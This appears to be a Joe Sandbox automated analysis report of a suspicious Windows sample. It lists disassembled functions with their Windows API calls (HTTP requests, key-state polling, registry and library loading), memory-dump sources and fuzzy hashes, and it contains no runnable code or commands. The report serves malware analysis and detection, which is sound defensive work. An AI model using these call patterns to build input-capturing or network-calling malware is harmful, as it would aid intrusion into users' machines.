                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000BC684
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000BC697
                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 000BC6C7
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 458670788-1403004172
                            • Opcode ID: 1ca3700d9fa89f5ddf7c6b0b1ce60edf1069da4fb5f459e5f8bdd4e5dc13df58
                            • Instruction ID: c30199dd9b22d182635b7938a5d96c8ee64cc9a559d76c036d778c519e1b7454
                            • Opcode Fuzzy Hash: 1ca3700d9fa89f5ddf7c6b0b1ce60edf1069da4fb5f459e5f8bdd4e5dc13df58
                            • Instruction Fuzzy Hash: 84210271900108BFEB18ABA4DC86DFFB7B8EF06314B104129F466E31E2DB744D4A9B20
                            Function 000D4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4A60
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D4A86
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000D4AB6
                            • InternetCloseHandle.WININET(00000000), ref: 000D4AFD
                              • Part of subcall function 000D56A9: GetLastError.KERNEL32(?,?,000D4A2B,00000000,00000000,00000001), ref: 000D56BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 1951874230-3916222277
                            • Opcode ID: 0233fbf03ebf1f3d13427f8599512820f83f39f9a53b4fb298ce2cfc1bdf5227
                            • Instruction ID: 43323e624893d5ba955299b66752450aafd2b3a017871555b0709759b4ee7b25
                            • Opcode Fuzzy Hash: 0233fbf03ebf1f3d13427f8599512820f83f39f9a53b4fb298ce2cfc1bdf5227
                            • Instruction Fuzzy Hash: 5321BEB5640308BFEB21DFA89C85EBFB6FCEB49748F10402BF545A6240EA708D058772
                            Function 000E8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009C657
                              • Part of subcall function 0009C619: GetStockObject.GDI32(00000011), ref: 0009C66B
                              • Part of subcall function 0009C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009C675
                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000E8F69
                            • LoadLibraryW.KERNEL32(?), ref: 000E8F70
                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000E8F85
                            • DestroyWindow.USER32(?), ref: 000E8F8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                            • String ID: SysAnimate32
                            • API String ID: 4146253029-1011021900
                            • Opcode ID: 887b4bd5958cae3e4e05c5713e7994942ecb77c103961b93b03f1ef25b25adb8
                            • Instruction ID: abd25b72a294fbda672f3cfe94460fc87c268f5793f658e2ab298797340298e7
                            • Opcode Fuzzy Hash: 887b4bd5958cae3e4e05c5713e7994942ecb77c103961b93b03f1ef25b25adb8
                            • Instruction Fuzzy Hash: F4219F71200245AFEF104EA6EC44FBB37EAEB49324F108624FA58A7191CB71DC909760
                            Function 000CE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 000CE392
                            • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 000CE3E6
                            • __swprintf.LIBCMT ref: 000CE3FF
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,0011DBF0), ref: 000CE43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu
                            • API String ID: 3164766367-685833217
                            • Opcode ID: 5d1fb0a5c9421a7c4072800a5373ecd2088dda509fec1c88da88bf02aceb7152
                            • Instruction ID: fdc44031f844dba3586d9e9b769e91d9095a3d6db1dac67a7566222be6292eab
                            • Opcode Fuzzy Hash: 5d1fb0a5c9421a7c4072800a5373ecd2088dda509fec1c88da88bf02aceb7152
                            • Instruction Fuzzy Hash: 21218035A40108AFCB10EFA4DC85EEEB7B8EF49715F104069F509D7252D771DA41CB61
                            Function 000BD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                              • Part of subcall function 000BD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 000BD640
                              • Part of subcall function 000BD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 000BD653
                              • Part of subcall function 000BD623: GetCurrentThreadId.KERNEL32 ref: 000BD65A
                              • Part of subcall function 000BD623: AttachThreadInput.USER32(00000000), ref: 000BD661
                            • GetFocus.USER32 ref: 000BD7FB
                              • Part of subcall function 000BD66C: GetParent.USER32(?), ref: 000BD67A
                            • GetClassNameW.USER32(?,?,00000100), ref: 000BD844
                            • EnumChildWindows.USER32(?,000BD8BA), ref: 000BD86C
                            • __swprintf.LIBCMT ref: 000BD886
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                            • String ID: %s%d
                            • API String ID: 1941087503-1110647743
                            • Opcode ID: 891a8c35901076f37621d86b25ab7959697c22addbe0a915275fbfa9a7352f60
                            • Instruction ID: 705ce3771ea37c06da022040e3a2a8f54dfa598712f3b3ab632086ab9548d674
                            • Opcode Fuzzy Hash: 891a8c35901076f37621d86b25ab7959697c22addbe0a915275fbfa9a7352f60
                            • Instruction Fuzzy Hash: 9F1184755002056BDF117F90DC85FEAB769AB48705F0040B6FE0DAA147EBB59945CB70
                            Function 000E1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 000E18E4
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 000E1917
                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 000E1A3A
                            • CloseHandle.KERNEL32(?), ref: 000E1AB0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                            • String ID:
                            • API String ID: 2364364464-0
                            • Opcode ID: bb6ed47a57efc4dd146c27d2cc81a0b78c3fea74a6999f773ac7ac0473ddb967
                            • Instruction ID: 2a392de2dfd4c402ce8dc5ba0a6063e2be8af7e5dfaf95f786856675c938f570
                            • Opcode Fuzzy Hash: bb6ed47a57efc4dd146c27d2cc81a0b78c3fea74a6999f773ac7ac0473ddb967
                            • Instruction Fuzzy Hash: 54816370A40215AFDF10AF65C886BED7BF9AF48720F198059F905BF382D7B4E9409B91
                            Function 000E0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 000E05DF
                            • GetProcAddress.KERNEL32(00000000,?), ref: 000E066E
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 000E068C
                            • GetProcAddress.KERNEL32(00000000,?), ref: 000E06D2
                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 000E06EC
                              • Part of subcall function 0009F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000CAEA5,?,?,00000000,00000008), ref: 0009F282
                              • Part of subcall function 0009F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,000CAEA5,?,?,00000000,00000008), ref: 0009F2A6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                            • String ID:
                            • API String ID: 327935632-0
                            • Opcode ID: 3016487732d7d7dc07fb279ebbf2a29a1830be425f5c35a8c6705508a2e070e9
                            • Instruction ID: b9a76112ba8a73efd59f217f2cf54ff1adc465b340852249d95e1370fe7f954e
                            • Opcode Fuzzy Hash: 3016487732d7d7dc07fb279ebbf2a29a1830be425f5c35a8c6705508a2e070e9
                            • Instruction Fuzzy Hash: 50515B75A002459FCB00EFA8C890EEDB7F5FF58310B148066E995AB352DB70ED85CB50
                            Function 000E2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 000E3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000E2AA6,?,?), ref: 000E3B0E
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E2DE0
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000E2E1F
                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 000E2E66
                            • RegCloseKey.ADVAPI32(?,?), ref: 000E2E92
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E2E9F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3440857362-0
                            • Opcode ID: 8617ace84929ea0b5c980fbd655fad193f21f1c234792dfa4a721f4d09edb90e
                            • Instruction ID: fc83adb51bc39a1113fef7ac6ac9cb67cd7c059e0c36de1fe6a32670b63c67ee
                            • Opcode Fuzzy Hash: 8617ace84929ea0b5c980fbd655fad193f21f1c234792dfa4a721f4d09edb90e
                            • Instruction Fuzzy Hash: BA514C71208244AFD704EF64CC81EAEB7E9FF88314F04492EF595972A2DB71E945CB52
                            Function 000ECB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43a1002dd1bd0d6fec5a9b461c3ea2944f5773ac5438ff1521f51361ed8fab28
                            • Instruction ID: 3ee9258a04213bab57846a10f5d908c974bc95a8afe743b81d360f6e1677db0d
                            • Opcode Fuzzy Hash: 43a1002dd1bd0d6fec5a9b461c3ea2944f5773ac5438ff1521f51361ed8fab28
                            • Instruction Fuzzy Hash: 9B412436900284FFE724DB69CC49FA9BBB8EB09320F244251F959F72E1C772AD42D650
                            Function 000D1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                            Download Yara Rule
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 000D17D4
                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 000D17FD
                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 000D183C
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 000D1861
                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 000D1869
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                            • String ID:
                            • API String ID: 1389676194-0
                            • Opcode ID: 696047e47afb592c73d55e649935661470b52697a8ed699b86a4024671eb3328
                            • Instruction ID: 92227876347b64965a1fd9d79c99e89a71853a1f9181655a3c8ee72d1a325bd1
                            • Opcode Fuzzy Hash: 696047e47afb592c73d55e649935661470b52697a8ed699b86a4024671eb3328
                            • Instruction Fuzzy Hash: FF411835A00215EFCB15EF64C981EADBBF5FF08310B1480A9E849AB362DB31ED41DB60
                            Function 0009B736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetCursorPos.USER32(000000FF), ref: 0009B749
                            • ScreenToClient.USER32(00000000,000000FF), ref: 0009B766
                            • GetAsyncKeyState.USER32(00000001), ref: 0009B78B
                            • GetAsyncKeyState.USER32(00000002), ref: 0009B799
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorScreen
                            • String ID:
                            • API String ID: 4210589936-0
                            • Opcode ID: 5564aa9478998ed12dd2b50697179ab5b0bb5a7bf3f688eca7e5fbd8f058e44f
                            • Instruction ID: d7fa129fa2d6161ecdb90703f5dc55d68daa475d4c271b6128d2b6a93abd0017
                            • Opcode Fuzzy Hash: 5564aa9478998ed12dd2b50697179ab5b0bb5a7bf3f688eca7e5fbd8f058e44f
                            • Instruction Fuzzy Hash: 50417F35508159FFDF259FA5D884AEDFBB4BB45730F204319F929962E0C730A990EB90
                            Function 000BC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 000BC156
                            • PostMessageW.USER32(?,00000201,00000001), ref: 000BC200
                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000BC208
                            • PostMessageW.USER32(?,00000202,00000000), ref: 000BC216
                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000BC21E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessagePostSleep$RectWindow
                            • String ID:
                            • API String ID: 3382505437-0
                            • Opcode ID: 34425ac0d49dbd642efc151ab55068fea583776cf35fcae0bc00985b3d2c24e5
                            • Instruction ID: 8352a22c560d406626b241fcff3add05dc88e8a13db3e40aa13085fad872096c
                            • Opcode Fuzzy Hash: 34425ac0d49dbd642efc151ab55068fea583776cf35fcae0bc00985b3d2c24e5
                            • Instruction Fuzzy Hash: 1531CCB1900219EBEB14CFA8DE4CADE3BB5EB05325F104629F821AB2D1C7B09944CB90
                            Function 000BE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsWindowVisible.USER32(?), ref: 000BE9CD
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000BE9EA
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000BEA22
                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000BEA48
                            • _wcsstr.LIBCMT ref: 000BEA52
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                            • String ID:
                            • API String ID: 3902887630-0
                            • Opcode ID: 3358eeb9664162af1418d34708da282b0a7ad2d0eea1470a3aa8ae7c62ed8fa1
                            • Instruction ID: 6737452f6d058d9266bd4c761ad64fb0e00b49ddc158ba5c4ce638d39e9e8c6c
                            • Opcode Fuzzy Hash: 3358eeb9664162af1418d34708da282b0a7ad2d0eea1470a3aa8ae7c62ed8fa1
                            • Instruction Fuzzy Hash: 2F21F9712042447AEB659BA9EC45EFF7BECDF46750F108029F849CA191DEA1EC409651
                            Function 000EDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • GetWindowLongW.USER32(?,000000F0), ref: 000EDCC0
                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 000EDCE4
                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 000EDCFC
                            • GetSystemMetrics.USER32(00000004), ref: 000EDD24
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,000D407D,00000000), ref: 000EDD42
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Long$MetricsSystem
                            • String ID:
                            • API String ID: 2294984445-0
                            • Opcode ID: ed34f185b36bccefede8497ab4266ffd245c573283bfa8d5f9e3d455f293c29b
                            • Instruction ID: a524732250987cd8dd4af8a9179d0d35c5a8a968b2906b5f38942f5627b7e10f
                            • Opcode Fuzzy Hash: ed34f185b36bccefede8497ab4266ffd245c573283bfa8d5f9e3d455f293c29b
                            • Instruction Fuzzy Hash: 3E21C871608252AFCB605F7A9C44B6937E5FB46375F200736F936E65E0D77098A0CB90
                            Function 000BCA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000BCA86
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BCAB8
                            • __itow.LIBCMT ref: 000BCAD0
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000BCAF6
                            • __itow.LIBCMT ref: 000BCB07
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$__itow$_memmove
                            • String ID:
                            • API String ID: 2983881199-0
                            • Opcode ID: 66b5de375b00b8cb88f5d8f7027c5e023e8463a67e00af6d23bb80570cf04a7b
                            • Instruction ID: 869ebb3bee794978d45bb330b8ff0b8c48062188b15d74fc5471192c12b3632c
                            • Opcode Fuzzy Hash: 66b5de375b00b8cb88f5d8f7027c5e023e8463a67e00af6d23bb80570cf04a7b
                            • Instruction Fuzzy Hash: 3F21D5727002087BEB21EAA89C47EDE7AA9EF9D710F104028F985E7182D7B1CD4587A5
                            Function 000C6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00083B1E: _wcsncpy.LIBCMT ref: 00083B32
                            • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 000C6DBA
